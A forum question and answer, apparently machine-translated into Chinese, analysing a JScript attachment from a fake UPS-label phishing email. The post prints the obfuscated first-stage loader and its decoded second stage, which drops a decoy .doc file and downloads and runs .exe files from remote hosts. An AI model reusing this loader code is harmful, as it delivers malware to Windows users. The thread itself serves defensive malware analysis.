電子郵件與UPS標籤腳本它做了什麼？

Question

我得到了電子郵件今天有人給我發了一個UPS標籤我沒有打開它，因爲我發現它可疑我想知道這是什麼代碼做，

感謝

var sder = "P"; 
 
var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder; 
 

 
var m = "LZUaj4-qfCYW4M3kjDIgGL844Arvxk8a-hL2LmwUe1fG4_p62GL1yQkO5QZj62RgjWMzKm3mojn5OZRDSmV0C9O7RF_9Lw"; 
 

 
var x = new Array("site link", "site link", "site link", "site link", "site link"); 
 
var t4 = "ht"+"tp"; 
 

 
var mul = "qwadro"; 
 
var ter = "/"; 
 
for (var i=0; i<x.length; i++) 
 
{ \t 
 
\t var vDJmB = function(){ 
 
\t \t return new ActiveXObject(g2); 
 
\t }(); 
 
\t var e = vDJmB; 
 

 
\t try 
 
\t { 
 
\t \t e.open("G"+"E"+"T", t4 + ":"+ter+ter+x[i]+"/c"+"o"+"unter/?"+m, false); 
 
\t \t e.send(); 
 

 
\t \t var r = e.responseText; 
 

 
\t \t if (r.length > 999+1 && r.indexOf(m) > -1) 
 
\t \t { 
 
\t \t \t eval(e.responseText.split(m).join(mul.substring(2,3))); 
 

 
\t \t \t break; 
 
\t \t }; 
 
\t } 
 
\t catch(e) 
 
\t { 
 
\t }; 
 
};

我想知道這段代碼做什麼，有人試圖從我那裏獲取信息？謝謝

Answer 1

這是一個專門針對Microsoft Windows的特洛伊木馬加載程序。它將一個指針e創建爲一個Msxml2.XMLHTTP activeX對象，vDJmB。

然後它使用密鑰m對數組x中的站點進行排序，以獲得多部分編碼的明文有效載荷組件r。該組件有效負載被解碼爲一個JavaScript字符串，然後進行評估。每個組件元素的長度介於5972和6266之間。在我的版本中有五個組件。

實際有效負載在解碼和評估時會引用其他幾個網站，創建多個對象，創建一個擴展名爲.doc的隨機字符文件，嘗試運行它，然後將錯誤捕獲到空處理程序中，然後下載png，重命名爲exe然後運行它...非常複雜的混淆，我會說。它最終會抓住什麼？不能告訴你，因爲我沒有Windows系統。

第一部分做如下（有在不同的站點名稱礦井這些組件五）：

var ld = 0; 
var cs = String.fromCharCode(92); 
var ll = [ "seperate_site2.com", "site_in_original4.com", "site_in_original4", "seperate_site2", "site_in_original1.com" ]; 
var ws = WScript.CreateObject("WScript.Shell"); 
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a"; 
var xo = WScript.CreateObject("Msxml2.XMLHTTP"); 
var xa = WScript.CreateObject("ADODB.Stream"); 
var fo = WScript.CreateObject("Scripting.FileSystemObject"); 
if (!fo.FileExists(fn + ".doc")) { 
    var fp = fo.CreateTextFile(fn + ".doc", true); 
    for (var i = 0; i < 8339; i++) { 
    fp.Write(String.fromCharCode(Math.floor(Math.random() * 64 + 20))); 
    }; 
    fp.Close(); 
    try {ws.Run(fn + ".doc", 1, 0);} catch (er) {}; 
    for (var n = 1; n <= 2; n++) { 
    for (var i = ld; i < ll.length; i++) { 
     var dn = 0; 
     try { 
     xo.open("GET", "http://" + ll[ i ] + "/counter/?" + n, false); 
     xo.send(); 
     if (xo.status == 200) { 
      xa.open(); 
      xa.type = 1; 
      xa.write(xo.responseBody); 
      if (xa.size > 10000) { 
      dn = 1; 
      xa.saveToFile(fn + n + ".exe", 2); 
      try {ws.Run(fn + n + ".exe", 1, 0);} catch (er) {}; 
      }; 
      xa.close(); 
     }; 
     if (dn == 1) { 
      ld = i; 
      break; 
     }; 
     } catch (er) {}; 
    }; 
    }; 
} else { 
    try {ws.Run(fn + ".doc", 1, 0);} catch (er) {}; 
}; 

我用犀牛調試器和Eclipse在Ubuntu 16.04，以評估該裝載機。